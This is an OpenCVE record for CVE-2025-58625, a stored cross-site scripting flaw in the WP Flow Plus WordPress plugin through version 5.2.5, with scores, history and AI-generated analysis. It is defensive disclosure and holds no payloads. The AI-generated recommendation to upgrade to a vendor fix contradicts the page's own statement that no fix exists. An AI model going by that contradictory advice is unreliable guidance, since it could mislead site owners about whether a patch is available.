Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spiffy Plugins WP Flow Plus wp-imageflow2 allows Stored XSS.This issue affects WP Flow Plus: from n/a through <= 5.2.5.
Published: 2025-09-03
Score: 5.9 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The vulnerability is a Stored Cross‑Site Scripting flaw that arises from improper neutralization of user‑supplied input during web page generation. A malicious actor can embed script code that will be executed in the browsers of any user who views the affected content, potentially allowing session hijacking, defacement, or the delivery of additional malware. The weakness is identified as CWE‑79.

Affected Systems

The flaw is present in the Spiffy Plugins WP Flow Plus "wp‑imageflow2" plugin and affects all versions from the earliest release up to and including 5.2.5.

Risk and Exploitability

The CVSS score of 5.9 indicates a medium severity level, while the EPSS score of less than 1% suggests a low probability of exploitation at this time. The vulnerability is not listed in the CISA KEV catalog. Attackers would likely need to inject malicious payloads through the plugin’s content entry points or through existing stored data, implying that authentication or administrative privileges may be required to create or modify affected content.

Generated by OpenCVE AI on April 30, 2026 at 02:49 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the WP Flow Plus plugin to the latest version newer than 5.2.5 to apply the vendor‑provided fix.
  • After upgrading, clear or review any content that was previously stored by the plugin to ensure no malicious scripts remain.
  • Limit the ability to edit plugin‑related content to trusted administrators only, reducing the risk of accidental or malicious payload injection.

Generated by OpenCVE AI on April 30, 2026 at 02:49 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
EUVD EUVD EUVD-2025-26542 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spiffy Plugins WP Flow Plus allows Stored XSS. This issue affects WP Flow Plus: from n/a through 5.2.5.
History

Thu, 23 Apr 2026 15:00:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 5.9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L'}

Wed, 01 Apr 2026 23:45:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spiffy Plugins WP Flow Plus allows Stored XSS. This issue affects WP Flow Plus: from n/a through 5.2.5. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spiffy Plugins WP Flow Plus wp-imageflow2 allows Stored XSS.This issue affects WP Flow Plus: from n/a through <= 5.2.5.
References
Metrics cvssV3_1

{'score': 5.9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L'}

Wed, 03 Sep 2025 19:45:00 +0000

Type Values Removed Values Added
First Time appeared Spiffyplugins
Spiffyplugins wp Flow Plus
Wordpress
Wordpress wordpress
Vendors & Products Spiffyplugins
Spiffyplugins wp Flow Plus
Wordpress
Wordpress wordpress

Wed, 03 Sep 2025 18:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Wed, 03 Sep 2025 14:45:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spiffy Plugins WP Flow Plus allows Stored XSS. This issue affects WP Flow Plus: from n/a through 5.2.5.
Title WordPress WP Flow Plus Plugin <= 5.2.5 - Cross Site Scripting (XSS) Vulnerability
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 5.9, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L'}

Subscriptions

Spiffyplugins Wp Flow Plus
Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:13:44.551Z

Reserved: 2025-09-03T09:03:04.975Z

Link: CVE-2025-58625

cve-icon Vulnrichment

Updated: 2025-09-03T17:36:14.336Z

cve-icon NVD

Status : Deferred

Published: 2025-09-03T15:15:45.627

Modified: 2026-04-23T15:33:29.117

Link: CVE-2025-58625

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-30T03:00:15Z

Weaknesses